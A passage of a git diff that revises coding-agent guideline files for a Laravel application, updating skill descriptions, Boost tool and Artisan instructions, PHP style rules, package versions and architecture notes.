 This project has domain-specific skills available. You MUST activate the relevant skill whenever you work in that domain—don't wait until you're stuck.
 
-- `livewire-development` — Develops reactive Livewire 3 components. Activates when creating, updating, or modifying Livewire components; working with wire:model, wire:click, wire:loading, or any wire: directives; adding real-time updates, loading states, or reactivity; debugging component behavior; writing Livewire tests; or when the user mentions Livewire, component, counter, or reactive UI.
-- `pest-testing` — Tests applications using the Pest 4 PHP framework. Activates when writing tests, creating unit or feature tests, adding assertions, testing Livewire components, browser testing, debugging test failures, working with datasets or mocking; or when the user mentions test, spec, TDD, expects, assertion, coverage, or needs to verify functionality works.
-- `tailwindcss-development` — Styles applications using Tailwind CSS v4 utilities. Activates when adding styles, restyling components, working with gradients, spacing, layout, flex, grid, responsive design, dark mode, colors, typography, or borders; or when the user mentions CSS, styling, classes, Tailwind, restyle, hero section, cards, buttons, or any visual/UI changes.
-- `developing-with-fortify` — Laravel Fortify headless authentication backend development. Activate when implementing authentication features including login, registration, password reset, email verification, two-factor authentication (2FA/TOTP), profile updates, headless auth, authentication scaffolding, or auth guards in Laravel applications.
-- `debugging-output-and-previewing-html-using-ray` — Use when user says &quot;send to Ray,&quot; &quot;show in Ray,&quot; &quot;debug in Ray,&quot; &quot;log to Ray,&quot; &quot;display in Ray,&quot; or wants to visualize data, debug output, or show diagrams in the Ray desktop application.
+- `laravel-best-practices` — Apply this skill whenever writing, reviewing, or refactoring Laravel PHP code. This includes creating or modifying controllers, models, migrations, form requests, policies, jobs, scheduled commands, service classes, and Eloquent queries. Triggers for N+1 and query performance issues, caching strategies, authorization and security patterns, validation, error handling, queue and job configuration, route definitions, and architectural decisions. Also use for Laravel code reviews and refactoring existing Laravel code to follow best practices. Covers any task involving Laravel backend PHP code patterns.
+- `configuring-horizon` — Use this skill whenever the user mentions Horizon by name in a Laravel context. Covers the full Horizon lifecycle: installing Horizon (horizon:install, Sail setup), configuring config/horizon.php (supervisor blocks, queue assignments, balancing strategies, minProcesses/maxProcesses), fixing the dashboard (authorization via Gate::define viewHorizon, blank metrics, horizon:snapshot scheduling), and troubleshooting production issues (worker crashes, timeout chain ordering, LongWaitDetected notifications, waits config). Also covers job tagging and silencing. Do not use for generic Laravel queues without Horizon, SQS or database drivers, standalone Redis setup, Linux supervisord, Telescope, or job batching.
+- `socialite-development` — Manages OAuth social authentication with Laravel Socialite. Activate when adding social login providers; configuring OAuth redirect/callback flows; retrieving authenticated user details; customizing scopes or parameters; setting up community providers; testing with Socialite fakes; or when the user mentions social login, OAuth, Socialite, or third-party authentication.
+- `livewire-development` — Use for any task or question involving Livewire. Activate if user mentions Livewire, wire: directives, or Livewire-specific concepts like wire:model, wire:click, invoke this skill. Covers building new components, debugging reactivity issues, real-time form validation, loading states, migrating from Livewire 2 to 3, converting component formats (SFC/MFC/class-based), and performance optimization. Do not use for non-Livewire reactive UI (React, Vue, Alpine-only, Inertia.js) or standard Laravel forms without Livewire.
+- `pest-testing` — Use this skill for Pest PHP testing in Laravel projects only. Trigger whenever any test is being written, edited, fixed, or refactored — including fixing tests that broke after a code change, adding assertions, converting PHPUnit to Pest, adding datasets, and TDD workflows. Always activate when the user asks how to write something in Pest, mentions test files or directories (tests/Feature, tests/Unit, tests/Browser), or needs browser testing, smoke testing multiple pages for JS errors, or architecture tests. Covers: it()/expect() syntax, datasets, mocking, browser testing (visit/click/fill), smoke testing, arch(), Livewire component tests, RefreshDatabase, and all Pest 4 features. Do not use for factories, seeders, migrations, controllers, models, or non-test PHP code.
+- `tailwindcss-development` — Always invoke when the user's message includes 'tailwind' in any form. Also invoke for: building responsive grid layouts (multi-column card grids, product grids), flex/grid page structures (dashboards with sidebars, fixed topbars, mobile-toggle navs), styling UI components (cards, tables, navbars, pricing sections, forms, inputs, badges), adding dark mode variants, fixing spacing or typography, and Tailwind v3/v4 work. The core use case: writing or fixing Tailwind utility classes in HTML templates (Blade, JSX, Vue). Skip for backend PHP logic, database queries, API routes, JavaScript with no HTML/CSS component, CSS file audits, build tool configuration, and vanilla CSS.
+- `fortify-development` — ACTIVATE when the user works on authentication in Laravel. This includes login, registration, password reset, email verification, two-factor authentication (2FA/TOTP/QR codes/recovery codes), profile updates, password confirmation, or any auth-related routes and controllers. Activate when the user mentions Fortify, auth, authentication, login, register, signup, forgot password, verify email, 2FA, or references app/Actions/Fortify/, CreateNewUser, UpdateUserProfileInformation, FortifyServiceProvider, config/fortify.php, or auth guards. Fortify is the frontend-agnostic authentication backend for Laravel that registers all auth routes and controllers. Also activate when building SPA or headless authentication, customizing login redirects, overriding response contracts like LoginResponse, or configuring login throttling. Do NOT activate for Laravel Passport (OAuth2 API tokens), Socialite (OAuth social login), or non-auth Laravel features.
+- `laravel-actions` — Build, refactor, and troubleshoot Laravel Actions using lorisleiva/laravel-actions. Use when implementing reusable action classes (object/controller/job/listener/command), converting service classes/controllers/jobs into actions, orchestrating workflows via faked actions, or debugging action entrypoints and wiring.
+- `debugging-output-and-previewing-html-using-ray` — Use when user says "send to Ray," "show in Ray," "debug in Ray," "log to Ray," "display in Ray," or wants to visualize data, debug output, or show diagrams in the Ray desktop application.
 
 ## Conventions
 
@@ -69,76 +76,51 @@ ## Replies
 
 # Laravel Boost
 
-- Laravel Boost is an MCP server that comes with powerful tools designed specifically for this application. Use them.
+## Tools
+
+- Laravel Boost is an MCP server with tools designed specifically for this application. Prefer Boost tools over manual alternatives like shell commands or file reads.
+- Use `database-query` to run read-only queries against the database instead of writing raw SQL in tinker.
+- Use `database-schema` to inspect table structure before writing migrations or models.
+- Use `get-absolute-url` to resolve the correct scheme, domain, and port for project URLs. Always use this before sharing a URL with the user.
+- Use `browser-logs` to read browser logs, errors, and exceptions. Only recent logs are useful, ignore old entries.
+
+## Searching Documentation (IMPORTANT)
+
+- Always use `search-docs` before making code changes. Do not skip this step. It returns version-specific docs based on installed packages automatically.
+- Pass a `packages` array to scope results when you know which packages are relevant.
+- Use multiple broad, topic-based queries: `['rate limiting', 'routing rate limiting', 'routing']`. Expect the most relevant results first.
+- Do not add package names to queries because package info is already shared. Use `test resource table`, not `filament 4 test resource table`.
+
+### Search Syntax
+
+1. Use words for auto-stemmed AND logic: `rate limit` matches both "rate" AND "limit".
+2. Use `"quoted phrases"` for exact position matching: `"infinite scroll"` requires adjacent words in order.
+3. Combine words and phrases for mixed queries: `middleware "rate limit"`.
+4. Use multiple queries for OR logic: `queries=["authentication", "middleware"]`.
 
 ## Artisan
 
-- Use the `list-artisan-commands` tool when you need to call an Artisan command to double-check the available parameters.
+- Run Artisan commands directly via the command line (e.g., `php artisan route:list`). Use `php artisan list` to discover available commands and `php artisan [command] --help` to check parameters.
+- Inspect routes with `php artisan route:list`. Filter with: `--method=GET`, `--name=users`, `--path=api`, `--except-vendor`, `--only-vendor`.
+- Read configuration values using dot notation: `php artisan config:show app.name`, `php artisan config:show database.default`. Or read config files directly from the `config/` directory.
+- To check environment variables, read the `.env` file directly.
 
-## URLs
+## Tinker
 
-- Whenever you share a project URL with the user, you should use the `get-absolute-url` tool to ensure you're using the correct scheme, domain/IP, and port.
-
-## Tinker / Debugging
-
-- You should use the `tinker` tool when you need to execute PHP to debug code or query Eloquent models directly.
-- Use the `database-query` tool when you only need to read from the database.
-
-## Reading Browser Logs With the `browser-logs` Tool
-
-- You can read browser logs, errors, and exceptions using the `browser-logs` tool from Boost.
-- Only recent browser logs will be useful - ignore old logs.
-
-## Searching Documentation (Critically Important)
-
-- Boost comes with a powerful `search-docs` tool you should use before trying other approaches when working with Laravel or Laravel ecosystem packages. This tool automatically passes a list of installed packages and their versions to the remote Boost API, so it returns only version-specific documentation for the user's circumstance. You should pass an array of packages to filter on if you know you need docs for particular packages.
-- Search the documentation before making code changes to ensure we are taking the correct approach.
-- Use multiple, broad, simple, topic-based queries at once. For example: `['rate limiting', 'routing rate limiting', 'routing']`. The most relevant results will be returned first.
-- Do not add package names to queries; package information is already shared. For example, use `test resource table`, not `filament 4 test resource table`.
-
-### Available Search Syntax
-
-1. Simple Word Searches with auto-stemming - query=authentication - finds 'authenticate' and 'auth'.
-2. Multiple Words (AND Logic) - query=rate limit - finds knowledge containing both "rate" AND "limit".
-3. Quoted Phrases (Exact Position) - query="infinite scroll" - words must be adjacent and in that order.
-4. Mixed Queries - query=middleware "rate limit" - "middleware" AND exact phrase "rate limit".
-5. Multiple Queries - queries=["authentication", "middleware"] - ANY of these terms.
+- Execute PHP in app context for debugging and testing code. Do not create models without user approval, prefer tests with factories instead. Prefer existing Artisan commands over custom tinker code.
+- Always use single quotes to prevent shell expansion: `php artisan tinker --execute 'Your::code();'`
+  - Double quotes for PHP strings inside: `php artisan tinker --execute 'User::where("active", true)->count();'`
 
 === php rules ===
 
 # PHP
 
 - Always use curly braces for control structures, even for single-line bodies.
-
-## Constructors
-
-- Use PHP 8 constructor property promotion in `__construct()`.
-    - <code-snippet>public function __construct(public GitHub $github) { }</code-snippet>
-- Do not allow empty `__construct()` methods with zero parameters unless the constructor is private.
-
-## Type Declarations
-
-- Always use explicit return type declarations for methods and functions.
-- Use appropriate PHP type hints for method parameters.
-
-<code-snippet name="Explicit Return Types and Method Params" lang="php">
-protected function isAccessible(User $user, ?string $path = null): bool
-{
-    ...
-}
-</code-snippet>
-
-## Enums
-
-- Typically, keys in an Enum should be TitleCase. For example: `FavoritePerson`, `BestLake`, `Monthly`.
-
-## Comments
-
-- Prefer PHPDoc blocks over inline comments. Never use comments within the code itself unless the logic is exceptionally complex.
-
-## PHPDoc Blocks
-
-- Add useful array shape type definitions when appropriate.
+- Use PHP 8 constructor property promotion: `public function __construct(public GitHub $github) { }`. Do not leave empty zero-parameter `__construct()` methods unless the constructor is private.
+- Use explicit return type declarations and type hints for all method parameters: `function isAccessible(User $user, ?string $path = null): bool`
+- Use TitleCase for Enum keys: `FavoritePerson`, `BestLake`, `Monthly`.
+- Prefer PHPDoc blocks over inline comments. Only add inline comments for exceptionally complex logic.
+- Use array shape type definitions in PHPDoc blocks.
 
 === tests rules ===
 
@@ -151,47 +133,22 @@ # Test Enforcement
 
 # Do Things the Laravel Way
 
-- Use `php artisan make:` commands to create new files (i.e. migrations, controllers, models, etc.). You can list available Artisan commands using the `list-artisan-commands` tool.
+- Use `php artisan make:` commands to create new files (i.e. migrations, controllers, models, etc.). You can list available Artisan commands using `php artisan list` and check their parameters with `php artisan [command] --help`.
 - If you're creating a generic PHP class, use `php artisan make:class`.
 - Pass `--no-interaction` to all Artisan commands to ensure they work without user input. You should also pass the correct `--options` to ensure correct behavior.
 
-## Database
-
-- Always use proper Eloquent relationship methods with return type hints. Prefer relationship methods over raw queries or manual joins.
-- Use Eloquent models and relationships before suggesting raw database queries.
-- Avoid `DB::`; prefer `Model::query()`. Generate code that leverages Laravel's ORM capabilities rather than bypassing them.
-- Generate code that prevents N+1 query problems by using eager loading.
-- Use Laravel's query builder for very complex database operations.
-
 ### Model Creation
 
-- When creating new models, create useful factories and seeders for them too. Ask the user if they need any other things, using `list-artisan-commands` to check the available options to `php artisan make:model`.
+- When creating new models, create useful factories and seeders for them too. Ask the user if they need any other things, using `php artisan make:model --help` to check the available options.
 
-### APIs & Eloquent Resources
+## APIs & Eloquent Resources
 
 - For APIs, default to using Eloquent API Resources and API versioning unless existing API routes do not, then you should follow existing application convention.
 
-## Controllers & Validation
-
-- Always create Form Request classes for validation rather than inline validation in controllers. Include both validation rules and custom error messages.
-- Check sibling Form Requests to see if the application uses array or string based validation rules.
-
-## Authentication & Authorization
-
-- Use Laravel's built-in authentication and authorization features (gates, policies, Sanctum, etc.).
-
 ## URL Generation
 
 - When generating links to other pages, prefer named routes and the `route()` function.
 
-## Queues
-
-- Use queued jobs for time-consuming operations with the `ShouldQueue` interface.
-
-## Configuration
-
-- Use environment variables only in configuration files - never use the `env()` function directly outside of config files. Always use `config('app.name')`, not `env('APP_NAME')`.
-
 ## Testing
 
 - When creating models for tests, use the factories for the models. Check if the factory has custom states that can be used before manually setting up the model.
@@ -232,16 +189,15 @@ ### Models
 
 # Livewire
 
-- Livewire allows you to build dynamic, reactive interfaces using only PHP — no JavaScript required.
-- Instead of writing frontend code in JavaScript frameworks, you use Alpine.js to build the UI when client-side interactions are required.
-- State lives on the server; the UI reflects it. Validate and authorize in actions (they're like HTTP requests).
-- IMPORTANT: Activate `livewire-development` every time you're working with Livewire-related tasks.
+- Livewire allow to build dynamic, reactive interfaces in PHP without writing JavaScript.
+- You can use Alpine.js for client-side interactions instead of JavaScript frameworks.
+- Keep state server-side so the UI reflects it. Validate and authorize in actions as you would in HTTP requests.
 
 === pint/core rules ===
 
 # Laravel Pint Code Formatter
 
-- You must run `vendor/bin/pint --dirty --format agent` before finalizing changes to ensure your code matches the project's expected style.
+- If you have modified any PHP files, you must run `vendor/bin/pint --dirty --format agent` before finalizing changes to ensure your code matches the project's expected style.
 - Do not run `vendor/bin/pint --test --format agent`, simply run `vendor/bin/pint --format agent` to fix any formatting issues.
 
 === pest/core rules ===
@@ -251,22 +207,5 @@ ## Pest
 - This project uses Pest for testing. Create tests: `php artisan make:test --pest {name}`.
 - Run tests: `php artisan test --compact` or filter: `php artisan test --compact --filter=testName`.
 - Do NOT delete tests without approval.
-- CRITICAL: ALWAYS use `search-docs` tool for version-specific Pest documentation and updated code examples.
-- IMPORTANT: Activate `pest-testing` every time you're working with a Pest or testing-related task.
 
-=== tailwindcss/core rules ===
-
-# Tailwind CSS
-
-- Always use existing Tailwind conventions; check project patterns before adding new ones.
-- IMPORTANT: Always use `search-docs` tool for version-specific Tailwind CSS documentation and updated code examples. Never rely on training data.
-- IMPORTANT: Activate `tailwindcss-development` every time you're working with a Tailwind CSS or styling-related task.
-
-=== laravel/fortify rules ===
-
-# Laravel Fortify
-
-- Fortify is a headless authentication backend that provides authentication routes and controllers for Laravel applications.
-- IMPORTANT: Always use the `search-docs` tool for detailed Laravel Fortify patterns and documentation.
-- IMPORTANT: Activate `developing-with-fortify` skill when working with Fortify authentication features.
 </laravel-boost-guidelines>
diff --git a/CLAUDE.md b/CLAUDE.md
index 5dc2f7eee..99e996756 100644
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -37,14 +37,33 @@ # Frontend
 ## Architecture
 
 ### Backend Structure (app/)
-- **Actions/** — Domain actions organized by area (Application, Database, Docker, Proxy, Server, Service, Shared, Stripe, User). Uses `lorisleiva/laravel-actions`.
-- **Livewire/** — All UI components (Livewire 3). Pages organized by domain: Server, Project, Settings, Notifications, etc. This is the primary UI layer — no traditional Blade controllers.
-- **Jobs/** — Queue jobs for deployments (`ApplicationDeploymentJob`), backups, Docker cleanup, server management, proxy configuration.
-- **Models/** — Eloquent models. Key models: `Server`, `Application`, `Service`, `Project`, `Environment`, `Team`, plus standalone database models (`StandalonePostgresql`, `StandaloneMysql`, etc.).
-- **Services/** — Business logic services.
-- **Helpers/** — Global helper functions loaded via `bootstrap/includeHelpers.php`.
-- **Data/** — Spatie Laravel Data DTOs.
-- **Enums/** — PHP enums (TitleCase keys).
+- **Actions/** — Domain actions organized by area (Application, Database, Docker, Proxy, Server, Service, Shared, Stripe, User, CoolifyTask, Fortify). Uses `lorisleiva/laravel-actions` with `AsAction` trait — actions can be called as objects, dispatched as jobs, or used as controllers.
+- **Livewire/** — All UI components (Livewire 3). Pages organized by domain: Server, Project, Settings, Security, Notifications, Terminal, Subscription, SharedVariables. This is the primary UI layer — no traditional Blade controllers. Components listen to private team channels for real-time status updates via Soketi.
+- **Jobs/** — Queue jobs for deployments (`ApplicationDeploymentJob`), backups, Docker cleanup, server management, proxy configuration. Uses Redis queue with Horizon for monitoring.
+- **Models/** — Eloquent models extending `BaseModel` which provides auto-CUID2 UUID generation. Key models: `Server`, `Application`, `Service`, `Project`, `Environment`, `Team`, plus standalone database models (`StandalonePostgresql`, `StandaloneMysql`, etc.). Common traits: `HasConfiguration`, `HasMetrics`, `HasSafeStringAttribute`, `ClearsGlobalSearchCache`.
+- **Services/** — Business logic services (ConfigurationGenerator, DockerImageParser, ContainerStatusAggregator, HetznerService, etc.). Use Services for complex orchestration; use Actions for single-purpose domain operations.
+- **Helpers/** — Global helpers loaded via `bootstrap/includeHelpers.php` from `bootstrap/helpers/` — organized into `shared.php`, `constants.php`, `versions.php`, `subscriptions.php`, `domains.php`, `docker.php`, `services.php`, `github.php`, `proxy.php`, `notifications.php`.
+- **Data/** — Spatie Laravel Data DTOs (e.g., `CoolifyTaskArgs`, `ServerMetadata`).
+- **Enums/** — PHP enums (TitleCase keys). Key enums: `ProcessStatus`, `Role` (MEMBER/ADMIN/OWNER with rank comparison), `BuildPackTypes`, `ProxyTypes`, `ContainerStatusTypes`.
+- **Rules/** — Custom validation rules (`ValidGitRepositoryUrl`, `ValidServerIp`, `ValidHostname`, `DockerImageFormat`, etc.).
+
+### API Layer
+- REST API at `/api/v1/` with OpenAPI 3.0 attributes (`use OpenApi\Attributes as OA`) for auto-generated docs
+- Authentication via Laravel Sanctum with custom `ApiAbility` middleware for token abilities (read, write, deploy)
+- `ApiSensitiveData` middleware masks sensitive fields (IDs, credentials) in responses
+- API controllers in `app/Http/Controllers/Api/` use inline `Validator` (not Form Request classes)
+- Response serialization via `serializeApiResponse()` helper
+
+### Authorization
+- Policy-based authorization with ~15 model-to-policy mappings in `AuthServiceProvider`
+- Custom gates: `createAnyResource`, `canAccessTerminal`
+- Role hierarchy: `Role::MEMBER` (1) < `Role::ADMIN` (2) < `Role::OWNER` (3) with `lt()`/`gt()` comparison methods
+- Multi-tenancy via Teams — team auto-initializes notification settings on creation
+
+### Event Broadcasting
+- Soketi WebSocket server for real-time updates (ports 6001-6002 in dev)
+- Status change events: `ApplicationStatusChanged`, `ServiceStatusChanged`, `DatabaseStatusChanged`, `ProxyStatusChanged`
+- Livewire components subscribe to private team channels via `getListeners()`
 
 ### Key Domain Concepts
 - **Server** — A managed host connected via SSH. Has settings, proxy config, and destinations.
@@ -61,7 +80,7 @@ ### Frontend
 - Vite for asset bundling
 
 ### Laravel 10 Structure (NOT Laravel 11+ slim structure)
-- Middleware in `app/Http/Middleware/`
+- Middleware in `app/Http/Middleware/` — custom middleware includes `CheckForcePasswordReset`, `DecideWhatToDoWithUser`, `ApiAbility`, `ApiSensitiveData`
 - Kernels: `app/Http/Kernel.php`, `app/Console/Kernel.php`
 - Exception handler: `app/Exceptions/Handler.php`
 - Service providers in `app/Providers/`
@@ -71,7 +90,7 @@ ## Key Conventions
 - Use `php artisan make:*` commands with `--no-interaction` to create files
 - Use Eloquent relationships, avoid `DB::` facade — prefer `Model::query()`
 - PHP 8.4: constructor property promotion, explicit return types, type hints
-- Always create Form Request classes for validation
+- Validation uses inline `Validator` facade in controllers/Livewire components and custom rules in `app/Rules/` — not Form Request classes
 - Run `vendor/bin/pint --dirty --format agent` before finalizing changes
 - Every change must have tests — write or update tests, then run them. For bug fixes, follow TDD: write a failing test first, then fix the bug (see Test Enforcement below)
 - Check sibling files for conventions before creating new files
@@ -93,14 +112,17 @@ ## Foundational Context
 
 This application is a Laravel application and its main Laravel ecosystems package & versions are below. You are an expert with them all. Ensure you abide by these specific packages & versions.
 
-- php - 8.4.1
+- php - 8.5
 - laravel/fortify (FORTIFY) - v1
 - laravel/framework (LARAVEL) - v12
 - laravel/horizon (HORIZON) - v5
+- laravel/nightwatch (NIGHTWATCH) - v1
+- laravel/pail (PAIL) - v1
 - laravel/prompts (PROMPTS) - v0
 - laravel/sanctum (SANCTUM) - v4
 - laravel/socialite (SOCIALITE) - v5
 - livewire/livewire (LIVEWIRE) - v3
+- laravel/boost (BOOST) - v2
 - laravel/dusk (DUSK) - v8
 - laravel/mcp (MCP) - v0
 - laravel/pint (PINT) - v1
@@ -116,11 +138,15 @@ ## Skills Activation
 
 This project has domain-specific skills available. You MUST activate the relevant skill whenever you work in that domain—don't wait until you're stuck.
 
-- `livewire-development` — Develops reactive Livewire 3 components. Activates when creating, updating, or modifying Livewire components; working with wire:model, wire:click, wire:loading, or any wire: directives; adding real-time updates, loading states, or reactivity; debugging component behavior; writing Livewire tests; or when the user mentions Livewire, component, counter, or reactive UI.
-- `pest-testing` — Tests applications using the Pest 4 PHP framework. Activates when writing tests, creating unit or feature tests, adding assertions, testing Livewire components, browser testing, debugging test failures, working with datasets or mocking; or when the user mentions test, spec, TDD, expects, assertion, coverage, or needs to verify functionality works.
-- `tailwindcss-development` — Styles applications using Tailwind CSS v4 utilities. Activates when adding styles, restyling components, working with gradients, spacing, layout, flex, grid, responsive design, dark mode, colors, typography, or borders; or when the user mentions CSS, styling, classes, Tailwind, restyle, hero section, cards, buttons, or any visual/UI changes.
-- `developing-with-fortify` — Laravel Fortify headless authentication backend development. Activate when implementing authentication features including login, registration, password reset, email verification, two-factor authentication (2FA/TOTP), profile updates, headless auth, authentication scaffolding, or auth guards in Laravel applications.
-- `debugging-output-and-previewing-html-using-ray` — Use when user says &quot;send to Ray,&quot; &quot;show in Ray,&quot; &quot;debug in Ray,&quot; &quot;log to Ray,&quot; &quot;display in Ray,&quot; or wants to visualize data, debug output, or show diagrams in the Ray desktop application.
+- `laravel-best-practices` — Apply this skill whenever writing, reviewing, or refactoring Laravel PHP code. This includes creating or modifying controllers, models, migrations, form requests, policies, jobs, scheduled commands, service classes, and Eloquent queries. Triggers for N+1 and query performance issues, caching strategies, authorization and security patterns, validation, error handling, queue and job configuration, route definitions, and architectural decisions. Also use for Laravel code reviews and refactoring existing Laravel code to follow best practices. Covers any task involving Laravel backend PHP code patterns.
+- `configuring-horizon` — Use this skill whenever the user mentions Horizon by name in a Laravel context. Covers the full Horizon lifecycle: installing Horizon (horizon:install, Sail setup), configuring config/horizon.php (supervisor blocks, queue assignments, balancing strategies, minProcesses/maxProcesses), fixing the dashboard (authorization via Gate::define viewHorizon, blank metrics, horizon:snapshot scheduling), and troubleshooting production issues (worker crashes, timeout chain ordering, LongWaitDetected notifications, waits config). Also covers job tagging and silencing. Do not use for generic Laravel queues without Horizon, SQS or database drivers, standalone Redis setup, Linux supervisord, Telescope, or job batching.
+- `socialite-development` — Manages OAuth social authentication with Laravel Socialite. Activate when adding social login providers; configuring OAuth redirect/callback flows; retrieving authenticated user details; customizing scopes or parameters; setting up community providers; testing with Socialite fakes; or when the user mentions social login, OAuth, Socialite, or third-party authentication.
+- `livewire-development` — Use for any task or question involving Livewire. Activate if user mentions Livewire, wire: directives, or Livewire-specific concepts like wire:model, wire:click, invoke this skill. Covers building new components, debugging reactivity issues, real-time form validation, loading states, migrating from Livewire 2 to 3, converting component formats (SFC/MFC/class-based), and performance optimization. Do not use for non-Livewire reactive UI (React, Vue, Alpine-only, Inertia.js) or standard Laravel forms without Livewire.
+- `pest-testing` — Use this skill for Pest PHP testing in Laravel projects only. Trigger whenever any test is being written, edited, fixed, or refactored — including fixing tests that broke after a code change, adding assertions, converting PHPUnit to Pest, adding datasets, and TDD workflows. Always activate when the user asks how to write something in Pest, mentions test files or directories (tests/Feature, tests/Unit, tests/Browser), or needs browser testing, smoke testing multiple pages for JS errors, or architecture tests. Covers: it()/expect() syntax, datasets, mocking, browser testing (visit/click/fill), smoke testing, arch(), Livewire component tests, RefreshDatabase, and all Pest 4 features. Do not use for factories, seeders, migrations, controllers, models, or non-test PHP code.
+- `tailwindcss-development` — Always invoke when the user's message includes 'tailwind' in any form. Also invoke for: building responsive grid layouts (multi-column card grids, product grids), flex/grid page structures (dashboards with sidebars, fixed topbars, mobile-toggle navs), styling UI components (cards, tables, navbars, pricing sections, forms, inputs, badges), adding dark mode variants, fixing spacing or typography, and Tailwind v3/v4 work. The core use case: writing or fixing Tailwind utility classes in HTML templates (Blade, JSX, Vue). Skip for backend PHP logic, database queries, API routes, JavaScript with no HTML/CSS component, CSS file audits, build tool configuration, and vanilla CSS.
+- `fortify-development` — ACTIVATE when the user works on authentication in Laravel. This includes login, registration, password reset, email verification, two-factor authentication (2FA/TOTP/QR codes/recovery codes), profile updates, password confirmation, or any auth-related routes and controllers. Activate when the user mentions Fortify, auth, authentication, login, register, signup, forgot password, verify email, 2FA, or references app/Actions/Fortify/, CreateNewUser, UpdateUserProfileInformation, FortifyServiceProvider, config/fortify.php, or auth guards. Fortify is the frontend-agnostic authentication backend for Laravel that registers all auth routes and controllers. Also activate when building SPA or headless authentication, customizing login redirects, overriding response contracts like LoginResponse, or configuring login throttling. Do NOT activate for Laravel Passport (OAuth2 API tokens), Socialite (OAuth social login), or non-auth Laravel features.
+- `laravel-actions` — Build, refactor, and troubleshoot Laravel Actions using lorisleiva/laravel-actions. Use when implementing reusable action classes (object/controller/job/listener/command), converting service classes/controllers/jobs into actions, orchestrating workflows via faked actions, or debugging action entrypoints and wiring.
+- `debugging-output-and-previewing-html-using-ray` — Use when user says "send to Ray," "show in Ray," "debug in Ray," "log to Ray," "display in Ray," or wants to visualize data, debug output, or show diagrams in the Ray desktop application.
 
 ## Conventions
 
@@ -153,76 +179,51 @@ ## Replies
 
 # Laravel Boost
 
-- Laravel Boost is an MCP server that comes with powerful tools designed specifically for this application. Use them.
+## Tools
+
+- Laravel Boost is an MCP server with tools designed specifically for this application. Prefer Boost tools over manual alternatives like shell commands or file reads.
+- Use `database-query` to run read-only queries against the database instead of writing raw SQL in tinker.
+- Use `database-schema` to inspect table structure before writing migrations or models.
+- Use `get-absolute-url` to resolve the correct scheme, domain, and port for project URLs. Always use this before sharing a URL with the user.
+- Use `browser-logs` to read browser logs, errors, and exceptions. Only recent logs are useful, ignore old entries.
+
+## Searching Documentation (IMPORTANT)
+
+- Always use `search-docs` before making code changes. Do not skip this step. It returns version-specific docs based on installed packages automatically.
+- Pass a `packages` array to scope results when you know which packages are relevant.
+- Use multiple broad, topic-based queries: `['rate limiting', 'routing rate limiting', 'routing']`. Expect the most relevant results first.
+- Do not add package names to queries because package info is already shared. Use `test resource table`, not `filament 4 test resource table`.
+
+### Search Syntax
+
+1. Use words for auto-stemmed AND logic: `rate limit` matches both "rate" AND "limit".
+2. Use `"quoted phrases"` for exact position matching: `"infinite scroll"` requires adjacent words in order.
+3. Combine words and phrases for mixed queries: `middleware "rate limit"`.
+4. Use multiple queries for OR logic: `queries=["authentication", "middleware"]`.
 
 ## Artisan
 
-- Use the `list-artisan-commands` tool when you need to call an Artisan command to double-check the available parameters.
+- Run Artisan commands directly via the command line (e.g., `php artisan route:list`). Use `php artisan list` to discover available commands and `php artisan [command] --help` to check parameters.
+- Inspect routes with `php artisan route:list`. Filter with: `--method=GET`, `--name=users`, `--path=api`, `--except-vendor`, `--only-vendor`.
+- Read configuration values using dot notation: `php artisan config:show app.name`, `php artisan config:show database.default`. Or read config files directly from the `config/` directory.
+- To check environment variables, read the `.env` file directly.
 
-## URLs
+## Tinker
 
-- Whenever you share a project URL with the user, you should use the `get-absolute-url` tool to ensure you're using the correct scheme, domain/IP, and port.
-
-## Tinker / Debugging
-
-- You should use the `tinker` tool when you need to execute PHP to debug code or query Eloquent models directly.
-- Use the `database-query` tool when you only need to read from the database.
-
-## Reading Browser Logs With the `browser-logs` Tool
-
-- You can read browser logs, errors, and exceptions using the `browser-logs` tool from Boost.
-- Only recent browser logs will be useful - ignore old logs.
-
-## Searching Documentation (Critically Important)
-
-- Boost comes with a powerful `search-docs` tool you should use before trying other approaches when working with Laravel or Laravel ecosystem packages. This tool automatically passes a list of installed packages and their versions to the remote Boost API, so it returns only version-specific documentation for the user's circumstance. You should pass an array of packages to filter on if you know you need docs for particular packages.
-- Search the documentation before making code changes to ensure we are taking the correct approach.
-- Use multiple, broad, simple, topic-based queries at once. For example: `['rate limiting', 'routing rate limiting', 'routing']`. The most relevant results will be returned first.
-- Do not add package names to queries; package information is already shared. For example, use `test resource table`, not `filament 4 test resource table`.
-
-### Available Search Syntax
-
-1. Simple Word Searches with auto-stemming - query=authentication - finds 'authenticate' and 'auth'.
-2. Multiple Words (AND Logic) - query=rate limit - finds knowledge containing both "rate" AND "limit".
-3. Quoted Phrases (Exact Position) - query="infinite scroll" - words must be adjacent and in that order.
-4. Mixed Queries - query=middleware "rate limit" - "middleware" AND exact phrase "rate limit".
-5. Multiple Queries - queries=["authentication", "middleware"] - ANY of these terms.
+- Execute PHP in app context for debugging and testing code. Do not create models without user approval, prefer tests with factories instead. Prefer existing Artisan commands over custom tinker code.
+- Always use single quotes to prevent shell expansion: `php artisan tinker --execute 'Your::code();'`
+  - Double quotes for PHP strings inside: `php artisan tinker --execute 'User::where("active", true)->count();'`
 
 === php rules ===
 
 # PHP
 
 - Always use curly braces for control structures, even for single-line bodies.
-
-## Constructors
-
-- Use PHP 8 constructor property promotion in `__construct()`.
-    - <code-snippet>public function __construct(public GitHub $github) { }</code-snippet>
-- Do not allow empty `__construct()` methods with zero parameters unless the constructor is private.
-
-## Type Declarations
-
-- Always use explicit return type declarations for methods and functions.
-- Use appropriate PHP type hints for method parameters.
-
-<code-snippet name="Explicit Return Types and Method Params" lang="php">
-protected function isAccessible(User $user, ?string $path = null): bool
-{
-    ...
-}
-</code-snippet>
-
-## Enums
-
-- Typically, keys in an Enum should be TitleCase. For example: `FavoritePerson`, `BestLake`, `Monthly`.
-
-## Comments
-
-- Prefer PHPDoc blocks over inline comments. Never use comments within the code itself unless the logic is exceptionally complex.
-
-## PHPDoc Blocks
-
-- Add useful array shape type definitions when appropriate.
+- Use PHP 8 constructor property promotion: `public function __construct(public GitHub $github) { }`. Do not leave empty zero-parameter `__construct()` methods unless the constructor is private.
+- Use explicit return type declarations and type hints for all method parameters: `function isAccessible(User $user, ?string $path = null): bool`
+- Use TitleCase for Enum keys: `FavoritePerson`, `BestLake`, `Monthly`.
+- Prefer PHPDoc blocks over inline comments. Only add inline comments for exceptionally complex logic.
+- Use array shape type definitions in PHPDoc blocks.
 
 === tests rules ===
 
@@ -231,61 +232,26 @@ # Test Enforcement
